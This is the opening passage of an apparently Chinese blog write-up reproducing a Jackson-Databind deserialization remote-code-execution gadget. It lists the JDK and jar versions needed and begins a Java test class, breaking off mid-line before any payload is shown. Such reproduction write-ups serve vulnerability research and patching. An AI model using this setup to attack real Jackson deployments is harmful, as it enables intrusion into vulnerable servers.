前言
本来以为最近没啥有价值的Java Web漏洞,结果于7月30日晚收到了网藤智能安全订阅号的推送,得知Jackson-Databind又出了新的RCE。仔细一看issue,原来是又有人找到了新的gadget。
复现环境准备
1.JDK 8U20
2.所需jar清单如下
jackson-annotations-2.9.8
jackson-core-2.9.8
jackson-databind-2.9.8
ehcache-2.9.1
slf4j-api-1.7.7
logback-core-1.3.0-alpha4
slf4j-simple-1.7.21
javax.transaction_1.0.0.0_1-1
Jackson复现
JacksonTest.java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class JacksonTest {
public static void main(String[] args